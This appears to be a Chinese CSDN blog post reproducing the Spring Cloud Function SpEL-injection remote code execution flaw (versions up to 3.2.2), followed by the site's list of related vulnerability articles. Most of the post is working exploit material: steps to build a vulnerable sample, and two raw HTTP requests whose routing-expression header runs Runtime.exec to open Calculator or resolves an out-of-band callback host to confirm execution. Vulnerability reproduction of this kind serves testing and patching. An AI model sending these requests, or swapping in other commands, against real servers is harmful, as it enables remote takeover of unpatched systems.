spring-cloud 0day漏洞复现

最新推荐文章于 2024-07-05 15:06:33 发布
最新推荐文章于 2024-07-05 15:06:33 发布
阅读量91 收藏
点赞数
文章标签: 安全 bug
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21531681/article/details/135233307
版权
本文详细描述了SpringCloudFunction中的0day漏洞,涉及RCE(RemoteCodeExecution)攻击,提供了PoC(ProofofConcept)示例,展示了如何利用`routing-expression`执行恶意代码。影响版本包括3.2.2及之前的版本。
摘要由CSDN通过智能技术生成

spring-cloud 0day漏洞复现

文章目录

spring-spel-0day-poc

spring-cloud/spring-cloud-function RCE EXP POC
https://github.com/spring-cloud/spring-cloud-function
header

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")

受影响吧版本

SpringCloudFunction 3 <= 漏洞版本 <= 3.2.2

build

wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
image

get path lists for test

find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'

...
functionRouter
uppercase
lowercase
...
image

poc1

POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5

helloexp
image

poc2

POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.helloexp.com")
Content-Length: 5

helloexp

official GitHub info

https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f

不走小道
关注
Spring Cloud Function SpEL表达式注入(CVE-2022-22963)
做自己喜欢的事,并将其发挥到极致!
04-02 1295
文章目录声明前言一、漏洞概述二、影响版本三、本地复现四、漏洞原理五、官方修复文档 声明 本文章仅用于漏洞复现和技术学习,切勿从事非法渗透行为,切记! 前言 在 Spring Cloud Function 版本 3.1.6、3.2.2 和不受支持的旧版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问。 一、漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由 funct
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1280
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
0day-Spring Cloud Function SPEL漏洞预警
qq_18209847的博客
04-03 1766
近日,信息安全部监测到Spring Cloud官方修复了一个Spring Cloud Function中的SPEL表达式注入漏洞
提高 Web 开发的安全意识,警惕第三方包的 0day 漏洞
本博客纯属个人网络笔记,如对阁下有用,甚喜;否则,关掉即可,不喜勿喷。专心写代码,不做键盘侠!
06-29 603
上周公司针对 Fastjson 低版本的 0day 漏洞问题,发布了排查通知,要求各项目组检查已发布的产品是否有 0day 漏洞风险,并提供升级包。这是我入职以来遇到的第二次漏洞升级事件,第一次是 Tomcat 的低版本的 “CVE-2018-1305” 漏洞
Spring Cloud应用安全扫描:发现与修复漏洞策略
iwork168的博客
01-14 144
本文重点探讨了Spring Cloud微服务应用的安全扫描问题,强调了定期发现并修复潜在安全漏洞的重要性。通过运用自动化工具如OWASP ZAP等进行安全检测,并结合配置Spring Cloud Security等内部安全组件,可有效识别和防范包括身份验证授权漏洞、数据传输不安全在内的多种安全风险。文章还给出了实例代码以指导开发者实施相应的安全策略,旨在帮助构建既高效又安全的Spring Cloud微服务架构。
SpringVulScan--burpsuite插件
m0_51607644的博客
07-06 3401
项目地址:GitHub - tpt11fb/SpringVulScan: burpsuite 的Spring漏洞扫描插件。SpringVulScan:支持检测:路由泄露|CVE-2022-22965|CVE-2022-22963|CVE-2022-22947|CVE-2016-4977
Spring Cloud Gateway(CVE-2022-22947)漏洞复现
weixin_45095113的博客
07-28 2426
Spring Cloud Gateway(CVE-2022-22947)漏洞复现
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
复现这个0day漏洞的步骤通常包括以下几步: 1. **识别易受攻击的端点**:查找Spring Cloud Gateway Actuator API 中开放的,且可能接受SpEL表达式的端点,如`/actuator/gateway/routes`或`/actuator/env`。 2. **...
Spring Cloud Gateway Actuator API中SpEL注入0day漏洞复现分析
资源摘要信息: "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现" Spring Cloud Gateway是Spring Cloud微服务架构中的一部分,提供API网关的功能,它使用了WebFlux框架,支持非阻塞的API...
The Story of 3 bugs that lead to Unauthorized RCE - Pascom Systems
m0_65876116的博客
10-21 535
【代码】The Story of 3 bugs that lead to Unauthorized RCE - Pascom Systems。
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)
热门推荐
xiaobai_20190815的博客
04-08 1万+
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 3月1日,VMware发布安全公告,Spring Cloud Gateway中存在远程代码执行漏洞(CVE-2022-22947),该漏洞的CVSSv3评分为10.0。当启用或暴露不安全的 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序容易受到代
【网络安全漏洞挖掘之Spring Cloud注入漏洞
最新发布
wlaq_juju的博客
07-05 1233
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
Spring Cloud Gateway中存在远程代码执行漏洞容易受到代码注入攻击
happy_a_bin的博客
04-20 754
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。二、影响版本 Spring Cloud Gateway 3.1.0 Spring Cloud Gateway 3.0.0 - 3.0.6 Spring Cloud Gateway 其它不支持的、已不再更新的版本 三、处置措施 1、立刻升级至3.0.7以上(不含3.1.0)或3.1.1以上;
突发!Spring Cloud 再爆高危漏洞。。赶紧修复!!
AI研习社
03-03 628
开发者(KaiFaX)面向全栈工程师的开发者专注于前端、Java/Python/Go/PHP的技术社区Spring Cloud 突发漏洞Log4j2 的核弹级漏洞刚告一段落,Spring ...
Spring Cloud Function Spel表达式注入漏洞分析
m0_67391120的博客
08-24 892
简单了解了一下FaaS的的函数交付模式,和之前研究的容器安全场景下的微服务架构非常的契合,以往的大多数环境主要通过虚拟机交付逐渐演变了成了VPS、容器、API到现在的函数即服务;找到对应方法的RoutingFunction.class的文件内容,定位到对应的第80行的代码出,可以发现该方法主要Message的内容已经被传递过来;相关的配置项目可以在pom.xml当中进行修改,从项目当中可以看到依赖的组件版本为3.2.2是存在漏洞的版本,即可直接启动项目,无需其他的修改;
SpringCloudGateway爆漏洞,快看看你的服务中招没?
Java笔记虾
03-13 1499
点击关注公众号,利用碎片时间学习同学们,最近相信大家都看到了SpringCloudGateway爆出相关漏洞的信息了,既然如此,你们还不抓紧修改自己的程序吗?即使你没涉及到此次的漏洞,我也...
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2500
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
Spring Cloud 再爆高危漏洞.... 赶紧修复
终码一生
03-07 5166
点击“终码一生”,关注,置顶公众号 每日技术干货,第一时间送达! Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway又突发高危漏洞,又得折腾了。。。 2022年3月1日,Spring官方发布了关于Spring Cloud Gateway的两个CVE漏洞,分别为CVE-2022-22946与CVE-2022-22947: 版本/分支/tag:3.4.X 问题描述: Spring Cloud Gateway 是 Spring Cloud .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不走小道

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值